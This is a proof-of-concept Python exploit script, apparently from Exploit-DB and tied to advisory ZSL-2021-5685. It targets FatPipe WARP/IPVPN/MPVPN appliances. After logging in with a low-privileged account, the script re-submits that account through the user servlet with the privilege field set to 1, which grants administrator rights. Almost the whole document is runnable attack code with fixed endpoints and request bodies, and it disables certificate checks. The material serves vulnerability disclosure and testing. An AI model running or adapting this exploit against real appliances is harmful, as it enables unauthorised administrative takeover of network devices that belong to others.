
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
|
|
# Date: 25.07.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.fatpipeinc.com
#
# Note: the Exploit-DB metadata above pushes the shebang off line 1, so the
# "Executable file" bit will not help; run it as 'python3 escalator.py <IP>'.
#!/usr/bin/env python3
|
|
#
|
|
#
|
|
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
|
|
#
|
|
#
|
|
# Vendor: FatPipe Networks Inc.
|
|
# Product web page: https://www.fatpipeinc.com
|
|
# Affected version: WARP / IPVPN / MPVPN
|
|
# 10.2.2r38
|
|
# 10.2.2r25
|
|
# 10.2.2r10
|
|
# 10.1.2r60p82
|
|
# 10.1.2r60p71
|
|
# 10.1.2r60p65
|
|
# 10.1.2r60p58s1
|
|
# 10.1.2r60p58
|
|
# 10.1.2r60p55
|
|
# 10.1.2r60p45
|
|
# 10.1.2r60p35
|
|
# 10.1.2r60p32
|
|
# 10.1.2r60p13
|
|
# 10.1.2r60p10
|
|
# 9.1.2r185
|
|
# 9.1.2r180p2
|
|
# 9.1.2r165
|
|
# 9.1.2r164p5
|
|
# 9.1.2r164p4
|
|
# 9.1.2r164
|
|
# 9.1.2r161p26
|
|
# 9.1.2r161p20
|
|
# 9.1.2r161p17
|
|
# 9.1.2r161p16
|
|
# 9.1.2r161p12
|
|
# 9.1.2r161p3
|
|
# 9.1.2r161p2
|
|
# 9.1.2r156
|
|
# 9.1.2r150
|
|
# 9.1.2r144
|
|
# 9.1.2r129
|
|
# 7.1.2r39
|
|
# 6.1.2r70p75-m
|
|
# 6.1.2r70p45-m
|
|
# 6.1.2r70p26
|
|
# 5.2.0r34
|
|
#
|
|
# Summary: FatPipe Networks invented the concept of router-clustering,
|
|
# which provides the highest level of reliability, redundancy, and speed
|
|
# of Internet traffic for Business Continuity and communications. FatPipe
|
|
# WARP achieves fault tolerance for companies by creating an easy method
|
|
# of combining two or more Internet connections of any kind over multiple
|
|
# ISPs. FatPipe utilizes all paths when the lines are up and running,
|
|
# dynamically balancing traffic over the multiple lines, and intelligently
|
|
# failing over inbound and outbound IP traffic when ISP services and/or
|
|
# components fail.
|
|
#
|
|
# FatPipe IPVPN balances load and provides reliability among multiple
|
|
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
|
|
# IPVPN can also provide you an easy low-cost migration path from private
|
|
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
|
|
# MPLS and public networks without additional equipment at the provider's
|
|
# site.
|
|
#
|
|
# FatPipe MPVPN, a patented router clustering device, is an essential part
|
|
# of Disaster Recovery and Business Continuity Planning for Virtual Private
|
|
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
|
|
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
|
|
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
|
|
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
|
|
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
|
|
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
|
|
# you need to keep your VPN up and running despite failures of service, line,
|
|
# software, or hardware.
|
|
#
|
|
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her own privileges by sending an
# authenticated HTTP POST request to /fpui/userServlet (loadType=set,
# block=userSetRequest) whose 'userList' JSON parameter edits her own
# account with the 'privilege' attribute set to 1, thereby gaining
# administrative rights (group ADMINISTRATOR, 1). In other words, the user
# servlet does not enforce that only an administrator may change that
# attribute.
|
|
#
|
|
# Tested on: Apache-Coyote/1.1
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2021-5685
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
|
|
#
|
|
#
|
|
# 30.05.2016
|
|
# 25.07.2021
|
|
#
|
|
#
|
import getpass
import json
import sys
import time

import requests
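# --- PoC body -------------------------------------------------------------
#
# Flow: log in as the low-privileged user, then re-submit that user's own
# account through the user-management servlet with privilege "1".
#
# Changes against the original listing: raw_input() (Python 2) replaced with
# input()/getpass (the shebang says python3, where raw_input is a NameError),
# the JSON bodies are built with json.dumps instead of string concatenation
# (a quote or backslash in the password no longer corrupts the payload), every
# request has a timeout, network errors are reported instead of tracebacks,
# and failures exit non-zero so the script can be driven from a shell loop.

# Fixed paths of the two servlets the PoC talks to (see advisory above).
LOGIN_PATH = "/fpui/loginServlet"
USER_SET_PATH = "/fpui/userServlet?loadType=set&block=userSetRequest"

# Privilege values as the user servlet understands them. The original PoC
# sends the value as the string "1" (the advisory text says integer 1); the
# string form is kept because that is what was observed to work.
USER_PRIVILEGE = "0"
ADMIN_PRIVILEGE = "1"

# Upper bound (seconds) on any single HTTP exchange; the original PoC had
# none and could hang forever on an unresponsive appliance.
HTTP_TIMEOUT = 30

# Banner rows, centred between the asterisk borders when printed.
BANNER_WIDTH = 56
BANNER_ROWS = (
    "",
    "Privilege escalation from USER to ADMINISTRATOR role",
    "in",
    "FatPipe WARP/IPVPN/MPVPN v10.2.2",
    "",
    "ZSL-2021-5685",
    "",
)

# Decorative "climbing the ladder" art typed out after a successful login.
# Raw string so the backslashes in the drawing are not parsed as escapes
# (the original non-raw literal relied on invalid escapes such as '\_').
LADDER = r'''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' "")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \ \
|| || (__/ \___\
||====|| \_\
|| || / )
||====|| (__/
'''


def build_headers(host: str) -> dict[str, str]:
    """Return the browser-like request headers used for both requests.

    ``host`` is the appliance address (IP or host[:port]) from the command
    line; it only feeds the Origin and Referer values.  The header set is
    the one the original PoC captured from the web UI and is kept verbatim.
    """
    origin = "https://" + host
    return {
        "Sec-Ch-Ua": '" Not A;Brand";v="99", "Chromium";v="92"',
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Ch-Ua-Mobile": "?0",
        "User-Agent": "Fatnet/1.b",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": origin,
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": origin + "/fpui/dataCollectionServlet",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close",
    }


def build_login_params(username: str, password: str) -> dict[str, str]:
    """Return the form body for the login servlet.

    The servlet takes a single form field, ``loginParams``, whose value is a
    JSON document.  Compact separators reproduce the original byte layout
    for plain credentials; json.dumps additionally escapes quotes and
    backslashes, which the original string concatenation did not.
    """
    login_doc = {"username": username, "password": password, "authType": 0}
    return {"loginParams": json.dumps(login_doc, separators=(",", ":"))}


def build_escalation_params(
    username: str, password: str, privilege: str = ADMIN_PRIVILEGE
) -> dict[str, str]:
    """Return the form body that edits ``username``'s own account.

    The ``userList`` field carries a one-element JSON array describing an
    "edit" of the account, with ``privilege`` set to the requested group.
    The current password is resent unchanged, as in the original PoC, so
    the edit does not alter the account's password.
    """
    entry = {
        "userName": username,
        "oldUserName": username,
        "privilege": privilege,
        "password": password,
        "action": "edit",
        "state": False,
    }
    return {"userList": json.dumps([entry], separators=(",", ":"))}


def login(session, host: str, username: str, password: str) -> bool:
    """POST the credentials to the login servlet; True if the body says 'success'.

    Loose substring check inherited from the original PoC: the servlet's
    response format is not documented here, so any body containing
    'success' counts.  Raises requests.exceptions.RequestException on
    transport errors.
    """
    response = session.post(
        "https://" + host + LOGIN_PATH,
        headers=build_headers(host),
        data=build_login_params(username, password),
        verify=False,
        timeout=HTTP_TIMEOUT,
    )
    return "success" in response.text


def escalate(session, host: str, username: str, password: str) -> bool:
    """Submit the self-edit with privilege "1"; True if the body contains 'true'.

    Same caveat as login(): 'true' anywhere in the response is taken as
    success, which is what the original PoC did.  Raises
    requests.exceptions.RequestException on transport errors.
    """
    response = session.post(
        "https://" + host + USER_SET_PATH,
        headers=build_headers(host),
        data=build_escalation_params(username, password),
        verify=False,
        timeout=HTTP_TIMEOUT,
    )
    return "true" in response.text


def print_banner() -> None:
    """Print the usage banner between two asterisk borders."""
    border = "*" * BANNER_WIDTH
    print(border)
    for row in BANNER_ROWS:
        print("*" + row.center(BANNER_WIDTH - 2) + "*")
    print(border)


def type_out(text: str, delay: float = 0.01) -> None:
    """Write ``text`` one character at a time with ``delay`` seconds between them."""
    for char in text:
        sys.stdout.write(char)
        sys.stdout.flush()
        time.sleep(delay)


def main(argv: list[str]) -> int:
    """Run the PoC; ``argv`` is sys.argv-shaped (program name, then the host).

    Prompts for the low-privileged credentials (password not echoed), logs
    in, then edits the account to the ADMINISTRATOR group.  Returns 0 on
    success and 1 on a usage, login, transport or escalation failure.
    """
    if len(argv) != 2:
        print()
        print_banner()
        print("\n[POR] Usage: ./escalator.py [IP]")
        return 1

    host = argv[1]
    print()
    username = input("[UNE] Username: ")
    password = getpass.getpass("[UNE] Password: ")

    # The appliances ship self-signed certificates, so verification is off as
    # in the original PoC.  Be aware that this also means the credentials go
    # to whoever answers on the path; use it only on a network you control.
    requests.packages.urllib3.disable_warnings()

    try:
        with requests.Session() as session:
            if not login(session, host, username, password):
                print("[GRE] Login error.")
                return 1
            print("[POR] Authentication successful.")
            print("[POR] Climbing the ladder...")
            type_out(LADDER)
            if not escalate(session, host, username, password):
                print("\n[GRE] Something's fishy!")
                return 1
    except requests.exceptions.RequestException as exc:
        print("\n[GRE] HTTP request failed: %s" % exc)
        return 1

    print("\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))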